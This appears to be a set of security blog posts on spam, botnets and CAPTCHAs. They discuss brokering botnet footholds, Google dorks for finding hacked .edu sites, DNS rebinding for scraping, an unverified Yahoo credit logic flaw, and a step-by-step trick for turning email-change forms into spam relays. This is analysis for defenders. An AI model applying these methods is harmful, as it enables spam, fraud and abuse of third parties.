I’ve been spending more and more time talking to blackhats lately. Frankly, I think they’re fascinating people, and have a lot to teach the rest of us. With the solemn promise that I won’t try to put them in jail, we can have free flowing conversations which aid us all in thinking about the problem space. I’ve certainly learned a lot. Anyway, I got into a conversation with one of them about how he believes that a lot of the security put in place is actually doing a pretty good job.

The basic premise of the problem, from his perspective, is that hacking directly just isn’t as easy as it used to be, if you are like him. He’s not the type to hack randomly, he’s only interested in targeted attacks with big payouts. Sure, if you really work at it for days or weeks you’ll get in, almost always, but it’s not like it used to be where you’d just run a handful of basic tests and you were guaranteed to break in. The risk is that now when he sends his mules to go cash out, there’s a chance they’ll get nailed. Well, the more I thought about it the more I thought that this is a very solvable problem for bad guys. There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million machine botnet having compromised at least one machine within a target of interest is relatively high.

So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.

This tactic reminds me a little of the movie Wall Street. You have a failing company (in this case a botnet that will probably only last a year or two). If the company continues on it’s course it’ll make a pretty good amount of money, but nowhere near as much as if the owners break up the company into pieces and sell them off one by one to the interested parties. Kind of an interesting/scary thought, but it could easily be used to avoid the cost and danger of individual exploitation against a company for a hacker interested in target attacks. Rather, a brokerage for commodities (bots that come from interesting IPs/domains) could be created and used to sell off the individual nodes. Using the existing backdoor into the company greatly reduces the risks involved for badguy1, because it’s guaranteed to be successful, without all the noise of a targeted attack.

If you were a blackhat, how much would you pay to have access to a machine inside of an organization that will lead to the big payout?

I struggled a lot with this over the last few weeks as I thought about it more and more. I’ve known for a very long time that the SEO guys were hacking .edu websites to increase their pagerank for keywords. By getting .edu (which ranks higher than .com for instance because the domains are old and highly connected) to link to a site with the right keywords, Google is tricked into thinking the site is of higher value. Yes, Google’s algorithm really is that simple to get around, which is why there is a lot of garbage in their index now. It just took a while for the bad guys to get a large enough mass of hacked sites.

So I started messing around with search strings that would help me identify highly probably hacked sites and poof - within a few minutes I had dozens upon dozens of high value compromises:

inurl:.edu viagra
inurl:.edu cialis
inurl:.edu phentermine

There are millions of variants of these keywords phrases and their ilk across far greater masses of domains, but this should give you an idea of what’s possible. Some of them are truly amazingly bad. So I took it upon myself to start emailing a few that weren’t on this list but that were just as bad. You may or may not be surprised that I got almost no responses whatsoever. In fact, I only got one that was accusing me of spamming and/or ambulance chasing. Ugh! Talk about a way to make a guy want to quit being a good citizen.

But this brings up an interesting problem. Who exactly are the Internet cops? Some would argue that stopbadware which is heavily sponsored by Google is the equivalent. But it clearly sucks - given that all these were found within Google’s own index. What is the right way to alert a company that they’ve been compromised? Is it even worth bothering? Is my own site going to be viewed as a spam site with links like those above? What an ugly problem!

Okay, last post about DNS Rebinding and then I’ll (probably) shut up about it for a while. If you haven’t already, please read posts one and two for context. As I was thinking about the best possible uses for DNS Rebinding I actually landed on something that is extremely practical for botnets, email scrapers, blog spammers and so on. One of their largest problems for most attackers/spammers is that they need to be able to scrape the search engines for targets and the only way to do that is to send a massive amount of traffic at them and if they use a small subset of machines they are also making themselves easy to block or subvert. Google typically tries to stop robots from scraping by showing a CAPTCHA. Wouldn’t it be easier and better if the attacker/spammer could use other people’s IP addresses? That’s the promise of DNS Rebinding, now isn’t it - unauthenticated cross domain read access from other people’s computers.

David Ross had a good post about how another practical defense against DNS Rebinding is using SSL/TLS, but since Google has opted not to secure their search engine, it becomes possible to use DNS Rebinding for its next logical use. Google hasn’t even fixed their other SSL/TLS woes so there’s pretty much no chance they’re going to secure the search engine any time soon. So DNS Rebinding gives the attacker IP diversity. An attacker can use DNS Rebinding to get other people to rip tons of information from Google without Google being able to block the real attacker. Since sites like Google do not respect the host header and they don’t use SSL/TLS an attacker can scrape information from these sites all they want - all the while using other people’s browsers. Now think comment spamming, polling fraud, brute force, and on and on… All of these become extremely easy and practical by burning other people’s IP addresses, instead of the attacker’s/spammer’s. Yes, DNS Rebinding is nasty, and unless the browser companies do something or every attacked web server on earth starts respecting the host header and/or using SSL/TLS it’s a problem that’s here to stay.

I know a lot of people think this is a complicated technique, but it’s really not that hard. It just requires some JavaScript (similar to BeEF or XSS Shell), a place to log data to log whatever the user saw when the attacker forced them to perform the action, a hacked up DNS server (like the simple DNS Rebinding server sample), a domain, a Firewall that is somehow linked to the attacker/spammer application and some Internet traffic to abuse. None of these things are out of reach for a decently skilled attacker. Anyway, I doubt it’s getting fixed anytime soon, which means DNS Rebinding essentially allows nearly free reign for attackers and spammers for the foreseeable future - and no one appears to be doing anything about it.

I normally steer very clear from articles like this, but I was totally fascinated when I heard this. Both rat neurons and human neurons were used to steer a robotic car. They did so completely without computer or human intervention. They literally “thought” about what they wanted to do to complete a task. Interesting take on a Cyborg - don’t start with a human and tear it down and replace it’s extremities with mechanical parts, start with a machine and introduce a blank slate of a human brain tissue. Now, that’s amazing in it’s own right. But where are the applications for us in security? The first thing I thought of was a super advanced system for anomaly detection, but honestly, computers are far better at processing large data sets than people are. Plus brain-masses (for lack of a better term) lack knowledge and experience, so it would take years for them to even understand what they were looking at, let alone be better than a true human analyst. However, there is one thing that struck me as something that people mostly would agree humans should be better at than computers - CAPTCHA breaking.

Image analysis in general - yes, it’s possible, but CAPTCHAs should be easy. Just like a child, you’d have to teach it the alphabet, colors, lines, shapes, and all the basics. Then you’ve have to give it a reward system so it wouldn’t fatigue (read the Terminal Man if you want to see why that part is potentially dangerously problematic). But assuming you can get all that done, there is no reason a human brain-mass shouldn’t be able to solve CAPTCHAs just like a human would. You wouldn’t need a head on it, or really anything else. You could have multi-core human brain-mass computers all shoved into a rack. Just need a way to feed them and you’ve got yourself the most effective human analog CAPTCHA breaking system ever built. Scary and morbid, but extremely effective against all fluctuations in CAPTCHA design, assuming they were taught the parameters.

So what is exactly the definition of a CAPTCHA? I’ve harped on this before. But let’s think about it. What exactly is the measure of a human? Is it cognitive abilities? Then are mentally retarded people no longer considered people? Is it a physical body part? Then are people who have had limbs removed no longer human? What exactly are we trying to measure with a CAPTCHA if indeed the truest definition of such a thing could exist? I think what we are attempting to ascertain most of the time is intent. And with a human brain-mass anti-CAPTCHA system, that would no longer be something we could do. The only thing what we currently think of as CAPTCHAs would still be effective at is increasing the cost of spam. Of course this is all science fiction and riddled with problems, not the least of which is expense. But there are unfathomable military applications for such things, where expense is no longer an obstacle. Skynet may be coming, but it might not be a computer - it might be human brain-mass. Scary.

I’ve long been interested in spam and robots that scrape for email addresses. I’ve done tons of work in the space, although I’ve never published any of it. Call it more of a side hobby than anything I really want to go public with - as it is with a lot of my research. But anyway, today I was messing around with search engines and I found myself typing “at gmail dot com” into them for no apparent reason and poof, out popped a ton of valid although obfuscated email addresses. Aside from the raw text here’s a sampling of the different types:

…<at>gmail<dot>com
…(at) gmail (dot) com
… at-gmail-dot-com
… {at} {gmail} {dot} {com}
… [at] gmail [dot] com
… “at” gmail “dot” com
… at-gmail-dot-com-for.info
etc…

I think it would be interesting to create a generic algorithm for de-obfuscating email addresses of this nature. I’m sure it can be done to some degree, but some get more complicated, and I’m sure once you add in the variants of the username it gets even more complex. Even if you could get only 80% that would still be quite a feat. Still though, I have a feeling it wouldn’t take much effort to create a robot that made quick work of all those obfuscated email addresses. Of course, the benefit to a spammer in spamming people who proactively try to protect themselves from spam is questionable, but it’s still interesting.

In the wake of a few different speeches by Jeremiah Grossman and Billy Hoffman on logic flaws, I thought this was pretty appropriate. I got an anonymous message today explaining how an interesting logic flaw popped up in the search engine marketing portion of Yahoo’s website. According to them, the site allows you to send them $30 for future spending with their advertising program, and in return you get $50 free SEM advertising as a promotional offer. The problem lies in the logic.

When a user signs up, the logic should state something like “if money is deposited then give a credit, if not then fail”. Unfortunately, according to them it doesn’t work that way. Regardless if your deposit is valid or not or if it fails or not, it will still credit your account $50. Whoops. I haven’t tested this or tried it, but according to them at least a few people have already been able to use this trick, and of course that’s then tied to spamming or traffic arbitraging.

If the title of this post sounds awfully spammy, that’s because it is. Someone sent me a link to allbots.info and imagetotext.com today. Both of which are tied together into one system that allows someone to purchase a robot and the human CAPTCHA breaking necessary to create accounts in some of the largest social networking sites out there.

These include MySpace, Hi5, Facebook, Youtube, Gmail, and on and on… This reminds me a lot of XRumer which is also designed for the same purpose, but more for message boards and the like. Making hundreds of accounts, for spamming is getting more commonplace and accessible. Just plunk down your stolen PayPal or Google Checkout IDs and you’re off to the races! CAPTCHAs aren’t working folks - we’re just creating another micro-industry.

There’s an interesting link talking about the lawsuit that Rite Aid just settled regarding their accessibility issues. In part it was in regards to their in-store issues, but it was also about their online accessibility, specifically around CAPTCHAs. So I spent a little time doing some more research into other issues around CAPTCHAs and the blind and in fact there are even concerns around the audio CAPTCHAs for the deaf-blind users.

One thing that was interesting is that many of the sites that have been targeted for law suits and angst have been either online retailers or websites that are heavy text based websites (Typepad, Livejournal, etc…). I guess that makes perfect sense, I just hadn’t thought about it before. I would expect there to be a lot more of this in the future, so if you use CAPTCHAs I’d consider at least getting an audio version, as I’ve discussed countless times. An interesting thought though: spammers have made it harder on the blind. Yet another reason to hate spammers, I guess.

While looking back at some of my old speeches, and after writing the last blog post it occurred to me there is another attack I haven’t heard anyone talk about. Often times spammers will use contact member forms for spamming purposes. But most contact forms can’t spoof the contact name so this form of spamming is pretty limited. However, let’s consider another common scenario, which is that a user is allowed to change their email address. Almost never is there an email address confirmation link sent to make sure you are indeed the owner of the email address. So let’s take an actual example.

Let’s say Cathy wants to spam Alice, but Alice isn’t a member of the message board. Cathy signs up with two accounts, one to send messages from and one to receive them. Cathy logs in as the second user account and changes her email address to Alice’s. She then logs into the first user account and send the spam, which then gets routed to Alice. Then Cathy logs in to her second account, switches it to the next spam victim, logs back into her first account and sends a second spam and so on.

The limitations here are that the email must actually contain the spam message to work, so if it’s just a link back to the platform, that won’t suffice since Alice isn’t a legitimate user of the system, let alone has access to Cathy’s account. The second problem is that the email probably contains some site specific information which can easily identify the spam as such. And thirdly, many sites send an email change notification to alert users that their email has been changed, so when Cathy switches her address over and over, she will also inadvertantly be sending emails to her victims telling them that she’s switching accounts.

But in this way I believe many existing member to member communication functions can be used as spam gateways. Weird, huh?

I saw this article today and I just thought it was just too amazing. So it turns out that in North Dakota one very technologically impaired judge felt that running a zone transfer, among other things, is illegal. David Ritz was attempting to shut down a spammer, using the normal tactics to find out who was running the server that you’d expect, like looking at whois info, traceroute etc…. Oh no, not in North Dakota you don’t! He’s facing possible jail time for attempting to fight spam. Now there’s a twist for you! Isn’t there some sort of oversight for technically challenged judges? Or maybe a “I don’t know anything about this stuff, perhaps you should talk to Judge Bob about this instead, since he does” type system?

While Cynthia Rothe-Seeger (the district judge on this case) opinions are obviously technically questionable given that many of these tools are written specifically to find public information (that means available for anyone, including anti-spam organizations) this could set a legal precedent that enables spammers to operate with near legal impunity out of North Dakota. Great. So if you or someone you are investigating is based out of North Dakota - I’d watch this lawsuit until this is settled. Talk about taking one giant leap backwards for mankind. So fierce is off limits to you North Dakotans!